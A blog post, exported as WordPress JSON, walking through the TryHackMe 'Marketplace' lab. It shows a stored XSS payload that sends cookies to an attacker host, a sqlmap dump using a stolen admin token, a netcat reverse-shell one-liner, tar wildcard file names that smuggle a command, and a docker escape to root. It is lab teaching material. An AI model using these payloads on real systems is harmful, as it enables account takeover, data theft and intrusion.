{"id":132579,"date":"2023-03-20T19:59:05","date_gmt":"2023-03-20T19:59:05","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1229072"},"modified":"2023-03-20T19:59:05","modified_gmt":"2023-03-20T19:59:05","slug":"tryhackme-marketplace-walkthrough-how-i-pulled-off-a-cookie-heist-to-become-an-admin-of-the-target-website","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/03\/20\/tryhackme-marketplace-walkthrough-how-i-pulled-off-a-cookie-heist-to-become-an-admin-of-the-target-website\/","title":{"rendered":"[TryHackMe] Marketplace Walkthrough \u2013 How I Pulled Off a Cookie Heist to Become an Admin of the Target Website"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1229072&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/marketplace\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/marketplace<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: flag 1, <code>user.txt<\/code>, <code>root.txt<\/code><\/li>\n<li><strong>Highlight<\/strong>: cookie thievery to become admin on a website<\/li>\n<li><strong>Tools<\/strong>: <code>cookie heist, sqlmap, docker<\/code><\/li>\n<li><strong>Tags<\/strong>: <em>web, xss, docker, sqli, tar wildcard exploit<\/em><\/li>\n<\/ul>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-the-marketplace-walkthrough-how-i-pulled-off-a-cookie-heist-to-become-an-admin-of-the-target-website\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FKx1CyqMBHUY%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<h2>BACKGROUND<\/h2>\n<p>In this box, we are tasked with pen-testing an internal server to check for bugs before releasing it to the public. Judging by the tags on this box, we will execute some cross-site scripting and pull off a bit of SQL command injection. Let&#8217;s get started!<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"868\" height=\"343\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224.png\" alt=\"\" class=\"wp-image-1229085\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224.png 868w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224-300x119.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-224-768x303.png 768w\" sizes=\"auto, (max-width: 868px) 100vw, 868px\" \/><\/figure>\n<h2>ENUMERATION\/RECON<\/h2>\n<p><code>export myIP=10.10.129.195<\/code><\/p>\n<p><code>export targetIP=10.10.163.156<\/code><\/p>\n<p class=\"has-base-2-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f4a1.png\" alt=\"\ud83d\udca1\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Info<\/strong>: The walkthrough video includes several target IPs because I had to switch to the in-browser attack box part of the way through. I&#8217;m not sure why, but my VPN VM had serious stability issues with the target IP.<\/p>\n<p>So far, we know that the sysadmin&#8217;s name is Michael. Maybe that will be a username.<\/p>\n<h2>NMAP RESULTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"733\" height=\"456\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-228.png\" alt=\"\" class=\"wp-image-1229109\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-228.png 733w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-228-300x187.png 300w\" sizes=\"auto, (max-width: 733px) 100vw, 733px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -A -p- 10.10.28.52\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2023-03-02 08:33 EST\nStats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan\nConnect Scan Timing: About 10.33% done; ETC: 08:37 (0:04:03 remaining)\nNmap scan report for 10.10.28.52\nHost is up (0.085s latency).\nNot shown: 65533 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: | 2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)\n| 256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)\n|_ 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)\n80\/tcp open http nginx 1.19.2\n| http-robots.txt: 1 disallowed entry |_\/admin\n|_http-server-header: nginx\/1.19.2\n|_http-title: The Marketplace\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 238.51 seconds<\/pre>\n<h2>WALK THE WEBSITE<\/h2>\n<p>We gather that this website is a storefront with a login page. We can easily create a new user and post a new item. Let&#8217;s check if this new item might be able to run a script on the user who views it.<\/p>\n<h2>COMMAND INJECTION PROOF OF CONCEPT<\/h2>\n<p><code>&lt;script&gt;hello there&lt;\/script&gt;<\/code><\/p>\n<p>It works. Let&#8217;s use this to set up a script that will send us the admin&#8217;s cookie when they visit this item&#8217;s page.<\/p>\n<h2>USING COOKIE HEIST TO STEAL THE ADMIN&#8217;S COOKIE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"730\" height=\"569\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-229.png\" alt=\"\" class=\"wp-image-1229118\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-229.png 730w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-229-300x234.png 300w\" sizes=\"auto, (max-width: 730px) 100vw, 730px\" \/><\/figure>\n<\/div>\n<p>To save a bit of time from scripting our own cookie-stealing program, let&#8217;s grab CookieHeist from the <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/tacticthreat\/CookieHeist\" data-type=\"URL\" data-id=\"https:\/\/github.com\/tacticthreat\/CookieHeist\" target=\"_blank\">Git repo<\/a>.<\/p>\n<p>Next, we\u2019ll set up a <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\" rel=\"noreferrer noopener\">simple HTTP server<\/a> with <code>python3<\/code> to serve the <code>cookieheist<\/code> PHP script<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">python3 -m http.server<\/pre>\n<p>And start our listener to catch the stolen cookie.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<p>Now that everything is in place, we can test our script by visiting the item\u2019s page. On our listener, we catch our own token. <\/p>\n<p>Now we will click on the <code>report item<\/code> button. The admin should visit the page soon and then our heist will hopefully work as planned and the admin\u2019s cookie will be sent to us on the listener.<\/p>\n<p>It worked! Let\u2019s copy the token value below. Next, we\u2019ll prepare to use <code>sqlmap<\/code> to dump the database.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"798\" height=\"191\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225.png\" alt=\"\" class=\"wp-image-1229092\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225.png 798w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225-300x72.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-225-768x184.png 768w\" sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/figure>\n<h2>SWAP THE COOKIES AND SWITCH TO ADMIN\u2019S ACCOUNT<\/h2>\n<p>In our firefox browser, we can now log into ben\u2019s account, and, in the developer tab, navigate to storage and cookies. Simply switch out the cookies and hit reload, and you will discover a new administration panel with users and our first flag!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"573\" height=\"382\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-226.png\" alt=\"\" class=\"wp-image-1229093\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-226.png 573w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-226-300x200.png 300w\" sizes=\"auto, (max-width: 573px) 100vw, 573px\" \/><\/figure>\n<\/div>\n<h2>DUMP THE DATABASE WITH SQLMAP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"727\" height=\"486\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-230.png\" alt=\"\" class=\"wp-image-1229120\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-230.png 727w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-230-300x201.png 300w\" sizes=\"auto, (max-width: 727px) 100vw, 727px\" \/><\/figure>\n<\/div>\n<p>Next let\u2019s do some local enumeration with <code>sqlmap<\/code>. We will use the admin\u2019s cookie again in our command.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sqlmap http:\/\/10.10.197.89\/admin?user=3 --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2Nzc4NTczMjN9.DcEFxcLEnU7NUtNJEseq70na-gkRdEXtqkOLhGzZxVU' --technique=U --delay=3 -dump<\/pre>\n<p>*The <code>\u2013delay=3<\/code> helps us evade some data protections in place that crash <code>sqlmap<\/code> before it can extract anything.<\/p>\n<pre class=\"wp-block-preformatted\"><code> ___ __H__ ___ ___[(]_____ ___ ___ {1.6.11#stable}\n|_ -| . ['] | .'| . |\n|___|_ [\"]_|_|_|__,| _| |_|V... |_| https:\/\/sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:40:00 \/2023-03-03\/ Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y\/N] [05:40:12] [INFO] testing connection to the target URL\n[05:40:15] [INFO] checking if the target is protected by some kind of WAF\/IPS\n[05:40:21] [INFO] heuristic (basic) test shows that GET parameter 'user' might be injectable (possible DBMS: 'MySQL')\n[05:40:24] [INFO] testing for SQL injection on GET parameter 'user'\nit looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for o\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y\/n] it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y\/n] [05:40:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'\n[05:41:02] [WARNING] reflective value(s) found and filtering out\n[05:41:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[05:41:20] [INFO] target URL appears to have 4 columns in query\n[05:42:12] [WARNING] there is a possibility that the target (or WAF\/IPS) is dropping 'suspicious' requests\n[05:42:12] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)\n[05:43:51] [CRITICAL] connection timed out to the target URL\n[05:43:57] [INFO] GET parameter 'user' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable\n[05:43:57] [INFO] checking if the injection point on GET parameter 'user' is a false positive sqlmap identified the following injection point(s) with a total of 24 HTTP(s) requests:\n---\nParameter: user (GET) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: user=-5573 UNION ALL SELECT NULL,CONCAT(0x716a707871,0x736d5764774f6e48726c4a5579484373776c426e42494c6c58486379764f5a4a4d484e4f47546e53,0x71626a7071),NULL,NULL-- -\n---\n[05:47:20] [INFO] testing MySQL\n[05:47:23] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)\n[05:48:00] [INFO] confirming MySQL\n[05:48:06] [INFO] the back-end DBMS is MySQL\nweb application technology: Express, Nginx 1.19.2\nback-end DBMS: MySQL >= 8.0.0\n[05:48:21] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries\n[05:48:21] [INFO] fetching current database\n[05:48:24] [INFO] fetching tables for database: 'marketplace'\n[05:48:28] [INFO] fetching columns for table 'users' in database 'marketplace'\n[05:48:31] [INFO] fetching entries for table 'users' in database 'marketplace'\nDatabase: marketplace\nTable: users\n[4 entries]\n+----+--------------------------------------------------------------+----------+-----------------+\n| id | password | username | isAdministrator |\n+----+--------------------------------------------------------------+----------+-----------------+\n| 1 | $2b$10$83pRYaR\/d4ZWJVEex.lxu.Xs1a\/TNDBWIUmB4z.R0DT0MSGIGzsgW | system | 0 |\n| 2 | $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf\/1q | michael | 1 |\n| 3 | $2b$10$\/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG | jake | 1 |\n| 4 | $2b$10$UP9S8hhGQ4oam6K0iK35Ke.TLTN\/fXWhj\/Ak\/MvnkUw1XksDWH9py | ben | 0 |\n+----+--------------------------------------------------------------+----------+-----------------+ [05:48:34] [INFO] table 'marketplace.users' dumped to CSV file '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89\/dump\/marketplace\/users.csv'\n[05:48:34] [INFO] fetching columns for table 'items' in database 'marketplace'\n[05:48:37] [INFO] fetching entries for table 'items' in database 'marketplace'\n[05:48:40] [INFO] recognized possible password hashes in column 'image'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y\/N] y\n[05:48:49] [INFO] writing hashes to a temporary file '\/tmp\/sqlmapsc6t_j_x87459\/sqlmaphashes-ro5_o25b.txt' do you want to crack them via a dictionary-based attack? [Y\/n\/q] n\nDatabase: marketplace\nTable: items\n[3 entries]\n+----+----------------------------------+--------------------------------------------------------------------------------------------------------+--------+-----------------------+\n| id | image | title | author | description |\n+----+----------------------------------+--------------------------------------------------------------------------------------------------------+--------+-----------------------+\n| 1 | 867a9d1a2edc2995dca4b13de50fc545 | Dell Laptop | 2 | Good as new. |\n| 2 | abffe546fb4cb740cc6b44f9e4c263df | A cactus | 3 | Yep, that's a cactus. |\n| 3 | 598815c0f5554115631a3250e5db1719 | &lt;script>document.location=\"http:\/\/10.6.2.23:8000\/cookiesteal-simple.php?c=\" + document.cookie&lt;\/script> | 4 | d |\n+----+----------------------------------+--------------------------------------------------------------------------------------------------------+--------+-----------------------+ [05:48:59] [INFO] table 'marketplace.items' dumped to CSV file '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89\/dump\/marketplace\/items.csv'\n[05:48:59] [INFO] fetching columns for table 'messages' in database 'marketplace'\n[05:49:02] [INFO] fetching entries for table 'messages' in database 'marketplace'\nDatabase: marketplace\nTable: messages\n[3 entries]\n+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| id | is_read | user_to | user_from | message_content |\n+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| 1 | 1 | 3 | 1 | <strong>Hello!\\r\\nAn automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password.\\r\\nYour new password is: @b_ENXkGYUCAv3zJ<\/strong> |\n| 2 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |\n| 3 | 0 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |\n+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ [05:49:05] [INFO] table 'marketplace.messages' dumped to CSV file '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89\/dump\/marketplace\/messages.csv'\n[05:49:05] [WARNING] HTTP error codes detected during run:\n500 (Internal Server Error) - 10 times\n[05:49:05] [INFO] fetched data logged to text files under '\/home\/kalisurfer\/.local\/share\/sqlmap\/output\/10.10.197.89' [*] ending @ 05:49:05 \/2023-03-03\/\n<\/code><\/pre>\n<p>The info in <strong>bold<\/strong> above shows credentials for jake (user 3). Let&#8217;s try using these credentials to log in via SSH. <code>jake:@b_ENXkGYUCAv3zJ<\/code><\/p>\n<h2>INITIAL FOOTHOLD<\/h2>\n<p>We are in as Jake! And we found the user flag!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"530\" height=\"653\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-227.png\" alt=\"\" class=\"wp-image-1229094\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-227.png 530w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-227-243x300.png 243w\" sizes=\"auto, (max-width: 530px) 100vw, 530px\" \/><\/figure>\n<\/div>\n<h2>LOCAL RECON<\/h2>\n<p>First, let&#8217;s check our sudo permissions with <code>sudo -l<\/code><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">jake@the-marketplace:\/home\/marketplace$ sudo -l\nMatching Defaults entries for jake on the-marketplace: env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin User jake may run the following commands on the-marketplace: (michael) NOPASSWD: \/opt\/backups\/backup.sh<\/pre>\n<p>Let&#8217;s try to switch users to <code>michael<\/code> by leveraging the file <code>backup.sh<\/code> and our special sudo permissions to run it as user <code>michael<\/code>. <\/p>\n<p>First let&#8217;s examine the code.<\/p>\n<p><code>jake@the-marketplace:\/opt\/backups$ cat backup.sh<\/code><\/p>\n<p>Output:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/bin\/bash\necho \"Backing up files...\";\ntar cf \/opt\/backups\/backup.tar *<\/pre>\n<\/p>\n<p>As we can see, the <code>backup.sh<\/code> script activates a tarball with a wildcard to copy everything in the directory. We can exploit this by adding empty files with filenames that resemble flags on the command <code>backup.tar<\/code> to bypass some checkpoints.<\/p>\n<h2>TARBALL WILDCARD EXPLOIT<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"732\" height=\"486\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-231.png\" alt=\"\" class=\"wp-image-1229122\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-231.png 732w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-231-300x199.png 300w\" sizes=\"auto, (max-width: 732px) 100vw, 732px\" \/><\/figure>\n<\/div>\n<ol>\n<li>First, let&#8217;s create a reverse shell and copy it to the <code>\/opt\/backups<\/code> directory.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"mkfifo \/tmp\/gdsio; nc 10.10.163.156 8888 0&lt;\/tmp\/gdsio | \/bin\/sh >\/tmp\/gdsio 2>&amp;1; rm \/tmp\/gdsio\" > shell.sh<\/pre>\n<ol start=\"2\">\n<li>Create an empty file instructing tar to run the <code>shell.sh<\/code> file.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"\" > \"--checkpoint-action=exec=sh shell.sh\"<\/pre>\n<ol start=\"3\">\n<li>Create a second empty file to spoof the checkpoint 1 being reached.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"\" > --checkpoint=1<\/pre>\n<ol start=\"4\">\n<li>Let&#8217;s setup a Netcat listener on our attack machine to grab the reverse shell.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<ol start=\"5\">\n<li>Activate the exploit by running <code>backup.sh<\/code> as user Michael with sudo.<\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo -u michael .\/opt\/backups\/backup.sh<\/pre>\n<h2>EXPLOIT<\/h2>\n<p>MAKE USE OF THE GTFObins ALPINE EXPLOIT<\/p>\n<p>Now that we have caught the <strong>revshell<\/strong> as Michael, let&#8217;s poke around the filesystem a bit more. <\/p>\n<p>We can see that we are running docker. We&#8217;ll have to break out of the docker container in order to catch our root flag. GTFObins suggests leveraging alpine to escape the container.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">docker run -v \/:\/mnt --rm -it alpine chroot \/mnt sh<\/pre>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"730\" height=\"487\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-232.png\" alt=\"\" class=\"wp-image-1229127\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-232.png 730w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-232-300x200.png 300w\" sizes=\"auto, (max-width: 730px) 100vw, 730px\" \/><\/figure>\n<\/div>\n<p>In this box, the cookie-stealing technique showed how it is sometimes possible for malicious actors to gain quick access to another user&#8217;s or even an admin&#8217;s account on a website without even needing to know their password. <\/p>\n<p>To me, this was the most impressive take-away from the box.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: https:\/\/tryhackme.com\/room\/marketplace Difficulty: Medium Target: flag 1, user.txt, root.txt Highlight: cookie thievery to become admin on a website Tools: cookie heist, sqlmap, docker Tags: web, xss, docker, sqli, tar wildcard exploit BACKGROUND In this box, we are tasked with pen-testing an internal server to check for bugs before releasing [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-132579","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=132579"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132579\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=132579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=132579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=132579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}